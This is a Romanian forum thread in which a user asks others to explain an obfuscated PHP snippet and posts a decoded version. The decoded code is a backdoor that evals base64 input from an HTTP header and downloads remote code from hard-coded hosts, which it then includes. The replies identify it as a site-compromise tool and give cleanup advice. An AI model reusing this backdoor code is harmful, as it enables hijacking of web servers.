Decode php code si interpretare.

AlexH

Merg pe strada catre Mine...
Membru personal
Administrative
Freelancer
SEO Expert
As ruga programtorii care sunt aici poate ma ajuta sa interpretez acest code.
Ce face, la ce foloseste, daca este o problema de securitate, etc.

Codul codat:
Cod:
<?php                                                                                                                                                                 /*versio:3.01*/$Il1I=114406;if (!function_exists('I1ll1Il1')){$GLOBALS['Il1I'] = 'VqaW5pX3NldA$kYWxsb3dfdXJsX2ZvcGVu bPbEZGlzcGxheV9lcnJvcnMO(WZnRwL2Z0cDIwMTMxMTE0qMy4wMQ}#ASUlJMTExMQaHR0cDovLwCbSFRUUFMWfb2Zm.A?tYaHR0cHM6Ly8!SFRUUF9IT1NUVJodW5pb24MWLQc2VsZWN0TUkVRVUVTVF9VUkkx@U0NSSVBUX05BTUUoUVVFUllfU1RSSU5H=HkPw(tZGV0ZXJtaW5hdG9yjLgLmxvZwceSFRUUF9ZX0FVVEgGbsYmFzZTY0X2RlY29kZQZka}dmVyc2lviLQwxyLXBocA;SFRUUF9FWEVDUEhQDrIb3V0b2sISFRUUF9VU0VSX0FHRU5UO_LAZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAYQc2V6cW8ubmV0}bZmFzdGFkZHouY29tA}L3czLnBocD91PQdtaJms9aJnQ9cGhwJnA9E$JnY9NZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYzMXZtMHdNL3lwWFZGVWdVUUo1YVpMbTRWR3FMbnVLMUlVbVRTZE5XNFV5Y2l4b0JDSWdhNmVxMy8yeGZYZEExbVJxK2tjUCs4NzIrZVZuWHh3eC9XVEZvempsSzExYjhaTG5temhkbGxtdUdjWUxpNEVkN2RLd2pMTTA0TTl4VVJhNjV5U0o0eVdPM2phWll4dTRiUnluY1ZEd3N1WTVYWk8xYlFOMkdLTUQ3TTRRT0VOZzI4QitaVW9GZStxa3ZBd2lua1g2Nld6bTIvN01aR2VubmdPL2hMbHMrbkI3YTdBWFZsTTJjWmhuWmJ6aGVwbnZPQWpMZWJuTFU5WVVjVWpGRDE1R2NjTGxGdDlrcHpOL0JqKzRES3pzbVcyRGNDM2M1WWsyUW5VZVdBMFV5Yk8wQUs1VUFnc2RSTmNEZ2JxMlRKTHNLWUJEUVpSdGVhb1p6QVVwam9ZMlM4UEdxQlozQjJHV2xqd0ZoMnJyc3R4ZXRsb2FzNWkwaDFaa2tNVzBzeWMzK2hGcWRBMmVGUHhRVUtTSkdJeFRENXpzZUdEdFdGSjFZMFJVei9QMjdnQWh5Ylo0QzlDS2F2ZVkvSm1Id0JyTGc3b1VhN0xyaC9tdGY3Y0k0Si9KM21GN3VFUFRqOHU1bVZ4OW1NeE5GaTNoYm4vZE9aOHNIdWJUeGZ4cWV2OFJUOGlRSHo5dzdVK25rK3ZGd3ZzMDhSOFdKcnNnUjhDdUpDSDNpR3VyY3lnS0l4NkVTVmJ3QmhVZHpqZmI4cmN1RDRPYmF6R2FObnBWMFpWVUZTbE1WWkdEcUM0cXN2QW41a1dkZFFNYk04K0dOUzF3Qll1ZTFLbnlsekllYnVnNFFoM2Jyd2d3TzlydU1BbFV5V2ovVFJic1JVYmhWYk13RE1WUGRyTlkzTFVjeXdiQ3QveGJDdjl1c3FLOFpMQjRrU2E5RWtPNHlSTlpkSGR6Ri9qM2x0YlNMRngrbnN6dlBYOTZRT2xEd2ZQenF4K1EwNWZzUlo0bmVVcm0weHBMN3VSUWtjc2JHZXpzak9sL0ZEVTdyOW4vc0xaUmU4TkNyMEl0TmF4dzJnTXFsSEVrbzFoaEFHVUozWWcvYjVOc3hYV3RNczVVSW1IZkxrV29rcnUvMm84MXFNU2JnK2R3SCtsOGZZc3oyYTRFTDRFVk52NVJqQ0hXQ0RNOFhHZE0reEpvbG1SYTJpV3VpUzhEdEFkYzIvVVdLamIveFhNU0o2UW9WRGtON2lkekNNMVh5WHJFbytnMU1NNnRZUGZDSVZRZVVZSDZ2bDl6Qm0xWkhYVGNyaGxEaDFCK3BLcTc1amkyWW1HdXhnVjVUWmxSNzNJNkp1c2JqNnFiakk5dllTY3VxNGx0c0toTGVQWkdjUWNWTzlMbGttMjVSWm1YR2VBditPZVFrbTRIazhQQWNFWlp6cGZoR2dvc3dFSlpGa3lHd1AyM2pnOGFDeUszbVVndUlKcTFzTjRBTFVZWVFBbGY1ZkhIaG8wWEY5VGNhc1ErS3VzQ2V1SGdmYkpld1NyOTVLaXIrMkNWMDBOZkkySWM1eFAydldVUGU0S05BVDBhejdhRHpyOTRoeEtyRWMxMkIzSy9iVUJyT0tDNEVqbmFyeUJza2lYZ2JyQ0tjeDdDU1BKYnAzU3dLWFdCbUM0QklvTGdvM2M3Q1FMRCt1RE5BZXo5K1JmUWNIYzF2NElsWlRvMUpaZGQ1Zm55dDg2MDFvci9haFhyRFJTdjFpbzMyNVlWUVNjKzM2WHhjMDN5cmllS1VsdXNMVDdkYVkvN2xFbEZta3cvTjNlb1Q3QnFqeUlQa0I2VVhnMFBPd0NYNVNvb3hZVTF3MVJYdFRTeHRmcDgycDdMNGFFbERoVkh1Q0ZrT1FmZVhzNUxoMURXNDgrWHlYNGlXNXdraXNyRHBlVWU5S3dZZllyZ0tZL0w1WGN4UzlVbnlSZ2FLSWc0WXQ5Qi8wK0ZrcXBkaW0walNtd3FrYVR1amdqMkFDOHZUSXluamJtejA2VjhVZE9qcWpDQ095ZHhGU0ljeXZHcVJPaDJvSDNtamplcm50SnB5V1luOGRHU2NJandCM2dPSTl1S3U0ZlMwcXFONnlIR0dwYVVQdnFMOVpWSUFjallyTkZoaXRxVTJSSG9mQVJBMjRqcmVDdlhsV3JGR0FzNE02dGhwTjNIb1J1N28yZzlzc1BzOWFsNlFFZHdIeGltNmhTMU1SM0hGaGNVemFYSjZLR1ZhbmJCd1RQQllKQVpoOHp1SU1RTEtJRW5CUCsxVE5TcGQ5cllkYkJGbUt4QkFSTTZoc2lLNTdqVVJZSmdEdG8yT3ZjanpwZ2pFWHJ5OXZqdlhhUFRIVkxIM09zYWFueW9kL1VwNWsxRCtoQ3hIclF2S2pNY0NtRjQrYk9ub0FsbXhUMXhYYkpPakRjZ2hTYjRTTXlMUjNPaW9iUGI3cU1WY3RKeDZMMHkzbUZGNGNtRFBiR3FCcHptc0k1cDZrWGRNRnpqL0dYQUlGTENWQ0pzVkI4a0hUNW9xS3NHTFhGUVRBcm9ibmNCdzl0ZTNTdkVFQyt2S3ZzeCttVzJDOWQ2c3lJQUdNTmt0K0pCbG9aOGo5T29lQlZZZUdhaE5vRTgrS3Z3dnVHZUlRMEFUWS9SVEZDbDdCc2pEUEhTUkV4cE9GS1M1QlFsMHFnV1NhWFlsZVVCTHFzNTZPeHVCUXdOeGtCTUptOHJxanZzeXlPK2dFbnlNVDNpL256RjBxVmhXSzBmc3FORFRoWG9LNThteDVGSnpsYi9BenJqaTJZPSIpKSk7cHJlZ19yZXBsYWNlQb';function I1ll1Il1($a, $b){$c=$GLOBALS['Il1I']; $d=pack('H*','6261736536345f646'.'5636f6465'); return $d(substr($c, $a, $b));};$QO000Q000 = I1ll1Il1(3374, 16);$QO000Q000("/QQ0QQOOOQ/e", I1ll1Il1(502, 2872), "QQ0QQOOOQ");};?><?php

Codul decodat aici:

Cod:
<?php if (!defined("determinator")) {
    if (function_exists(I1ll1Il1(2, 10))) {
        @ini_set(I1ll1Il1(14, 20), 1);
        @ini_set(I1ll1Il1(39, 19), 0);
    }
    function w3net_feof($QQO0OQ, &$I1111l = NULL) {
        $I1111l = microtime(true);
        return feof($QQO0OQ);
    }
    function w3net_getfile($QQO0OO, $QOQQQQ) {
        $QO0Q00 = "curl";
        $I1IIl1 = $QO0Q00 . "_init";
        if (@ini_get("allow_url_fopen") == "1") {
            return @file_get_contents("http://" . $QQO0OO . $QOQQQQ . "&w=fgc");
        } elseif (function_exists($I1IIl1)) {
            $Ill11I = @$I1IIl1();
            $IllIII = $QO0Q00 . "_setopt";
            $QQQO0O = $QO0Q00 . "_exec";
            @$IllIII($Ill11I, CURLOPT_URL, "http://" . $QQO0OO . $QOQQQQ . "&w=cu");
            @$IllIII($Ill11I, CURLOPT_HEADER, false);
            @$IllIII($Ill11I, CURLOPT_RETURNTRANSFER, true);
            @$IllIII($Ill11I, CURLOPT_CONNECTTIMEOUT, 6);
            $IIllll = @$QQQO0O($Ill11I);
            @curl_close($Ill11I);
            if (empty($IIllll)) {
                $IIllll = "";
            }
            return $IIllll;
        } else {
            $QQO0OQ = @fsockopen($QQO0OO, 80, $Q00OO0, $QQ00O0, 5);
            if ($QQO0OQ) {
                $IlII11 = "";
                $I1111l = NULL;
                @fputs($QQO0OQ, "GET {$QOQQQQ}" . "&w=sk HTTP/1.0" . "
" . "Host: " . "{$QQO0OO}
");
                $III11I = PHP_OS . "/" . PHP_VERSION;
                @fputs($QQO0OQ, "User-Agent: {$III11I}

");
                while (!w3net_feof($QQO0OQ, $I1111l) && (microtime(true) - $I1111l) < 2) {
                    $IlII11.= @fgets($QQO0OQ, 128);
                }
                @fclose($QQO0OQ);
                $IllI1I = explode("

", $IlII11);
                unset($IllI1I[0]);
                return implode("

", $IllI1I);
            }
        }
    }
    function w3net_output($Q0Q0Q0, $QQOO0Q) {
        echo "Y_" . $Q0Q0Q0 . ":" . $QQOO0Q . "
";
    }
    function php_server($Q0QO0Q) {
        return @$_SERVER[$Q0QO0Q];
    }
    $I11lI1 = I1ll1Il1(61, 20);
    $QOQOOO = I1ll1Il1(82, 6);
    $Q0QO00 = I1ll1Il1(91, 10);
    $QQO0OO = I1ll1Il1(101, 10);
    if (isset($_SERVER[I1ll1Il1(113, 7) ])) {
        if (@$_SERVER[I1ll1Il1(113, 7) ] != I1ll1Il1(122, 4)) {
            $QQO0OO = I1ll1Il1(131, 11);
        }
    }
    $QQO0OO.= strtolower(@$_SERVER[I1ll1Il1(143, 12) ]);
    foreach ($_GET as $Q0Q0Q0 => $QQOO0Q) {
        if (strpos($QQOO0Q, I1ll1Il1(158, 7))) {
            $_GET[$Q0Q0Q0] = I1ll1Il1(166, 0);
        } elseif (strpos($QQOO0Q, I1ll1Il1(169, 8))) {
            $_GET[$Q0Q0Q0] = I1ll1Il1(166, 0);
        }
    }
    if (!isset($_SERVER[I1ll1Il1(178, 15) ])) {
        $_SERVER[I1ll1Il1(178, 15) ] = @$_SERVER[I1ll1Il1(195, 15) ];
        if (isset($_SERVER[I1ll1Il1(211, 16) ])) {
            $_SERVER[I1ll1Il1(178, 15) ].= I1ll1Il1(230, 2) . @$_SERVER[I1ll1Il1(211, 16) ];
        }
    }
    function get_temp_directory() {
        $Q0QOOO = dirname(__FILE__) . DIRECTORY_SEPARATOR;
        $QOO0OO = Array("/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $Q0QOOO . "tmp", $Q0QOOO . "wp-content/uploads", $Q0QOOO . "wp-content/cache",);
        foreach ($QOO0OO as $QQQQQO) {
            if (!empty($QQQQQO)) {
                $QQQQQO.= DIRECTORY_SEPARATOR;
                if (@is_writable($QQQQQO)) {
                    $Q0QOOO = $QQQQQO;
                    break;
                }
            }
        }
        return $Q0QOOO;
    }
    if (strlen($QQO0OO) < 10) {
        define(I1ll1Il1(234, 16), 0);
    } elseif ($I11l1l = $QQO0OO . @$_SERVER[I1ll1Il1(178, 15) ]) {
        $QQ0QOQ = @md5($QQO0OO . PHP_OS . $QOQOOO . $Q0QO00);
        $w3n_code = get_temp_directory() . I1ll1Il1(251, 2) . $QQ0QOQ;
        define(I1ll1Il1(234, 16), $w3n_code);
        $QOOQQQ = $w3n_code . I1ll1Il1(253, 6);
        if (@$_SERVER[I1ll1Il1(261, 15) ] == $QQ0QOQ) {
            $QOO0QQ = I1ll1Il1(279, 18);
            echo "
";
            w3net_output(I1ll1Il1(301, 8), $QOQOOO . I1ll1Il1(310, 2) . $I11lI1 . I1ll1Il1(315, 6));
            if ($IIl1ll = $QOO0QQ(@$_SERVER[I1ll1Il1(322, 16) ])) {
                eval($IIl1ll);
                echo "
";
                w3net_output(I1ll1Il1(341, 4), I1ll1Il1(345, 3));
            }
            exit(0);
        }
        $QQQ00Q = False;
        $QQ0QQQ = @strtolower(@$_SERVER[I1ll1Il1(349, 20) ]);
        foreach (explode(I1ll1Il1(371, 2), I1ll1Il1(373, 54)) as $IIll1l) {
            if (strpos($QQ0QQQ, $IIll1l) !== False) {
                $Il1IlI = @fopen($w3n_code . I1ll1Il1(253, 6), I1ll1Il1(427, 2));
                $Ill1l1 = @urlencode(@$_SERVER[I1ll1Il1(178, 15) ]);
                @fwrite($Il1IlI, time() . "    " . $IIll1l . "    " . $Ill1l1 . "
");
                @fclose($Il1IlI);
                $QQQ00Q = True;
                break;
            }
        }
        if (@is_file($w3n_code)) {
            @touch($w3n_code);
            @include_once ($w3n_code);
        } elseif ($QQQ00Q === True) {
            $Q00000 = Array(I1ll1Il1(429, 12), I1ll1Il1(443, 16));
            if (@touch($w3n_code)) {
                $I11l1l = @urlencode($I11l1l);
                $QOQQQQ = I1ll1Il1(461, 14) . $I11l1l . I1ll1Il1(478, 4) . $QQ0QOQ . I1ll1Il1(483, 12) . $I11lI1 . I1ll1Il1(497, 4) . $QOQOOO;
                $Il1III = w3net_getfile($Q00000[0], $QOQQQQ);
                @touch($w3n_code);
            }
        }
    } else {
        define(I1ll1Il1(234, 16), 1);
    }
}


Daca aveti probleme sa-l cititi aici accesati link de mai jos.
http://www.unphp.net/decode/a4d90160a54739fd27265c783cfbcc2b/


Multumesc
 
la prima vedere, e un cod criptat care permite unui atacator preluarea controlului acelui domeniu.
Vad ca se foloseste de diverse functii pentru a permite scrierea de noi fisiere pe server si citirea datelor de la distanta ba chiar daca serverul permite, executarea de scripturi shell.
In principiu, cine are asa ceva pe server poate spune ca a fost compromis si ar trebui sa refaca tot din backup si sa schimbe parolele de acces (atentie, ar trebui sa stergi tot ce e pe server ca nu se stie ce fisiere noi a pus atacatorul - backupul doar suprascrie fisierele existente dar nu sterge ce e in plus + refacut baza de date ca nu se stie ce useri cu drepturi de admin si-a scris prin ea).

codul nu e scris de un incepator, e destul de bine gandit (ignorand partea de criptare), cine l-a scris are destule cunostiinte de programare si de securitate + linux.
 
la prima vedere, e un cod criptat care permite unui atacator preluarea controlului acelui domeniu.
Vad ca se foloseste de diverse functii pentru a permite scrierea de noi fisiere pe server si citirea datelor de la distanta ba chiar daca serverul permite, executarea de scripturi shell.
In principiu, cine are asa ceva pe server poate spune ca a fost compromis si ar trebui sa refaca tot din backup si sa schimbe parolele de acces (atentie, ar trebui sa stergi tot ce e pe server ca nu se stie ce fisiere noi a pus atacatorul - backupul doar suprascrie fisierele existente dar nu sterge ce e in plus + refacut baza de date ca nu se stie ce useri cu drepturi de admin si-a scris prin ea).

codul nu e scris de un incepator, e destul de bine gandit (ignorand partea de criptare), cine l-a scris are destule cunostiinte de programare si de securitate + linux.

Multumesc frumos de raspuns.

Nu am pus scriptul pe server. Orice gasesc pe net prima data testez si scanez in calculator. Daca consider ca e sigur atunci il urc undeva.
Cum am pus codul aici pe forum nu am probleme nu?

Tot scriptul care are acest code, e plin de portite.

Faza cu wordpress coment o stiam.
 
marian ti-a dat link la codul decodat si explicat pe bucatele, ar trebui sa citesti linkul dat de el.
faptul ca ai pus codul aici e ok, nu e interpretat deci nu se va executa, nu iti face griji.

recomand ca sa nu mai faci "orice gasesc pe net prima data scanez si testez in pc" pentru ca poti sa iti virusezi pc-ul si appo sa compromiti prin ftp toate domeniile la care ai access.
daca vrei sa testezi ceva ce stii ca nu e ok, testeaza intr-un sistem virtual (pe pc-ul local)
 
Loading...
Back
Sus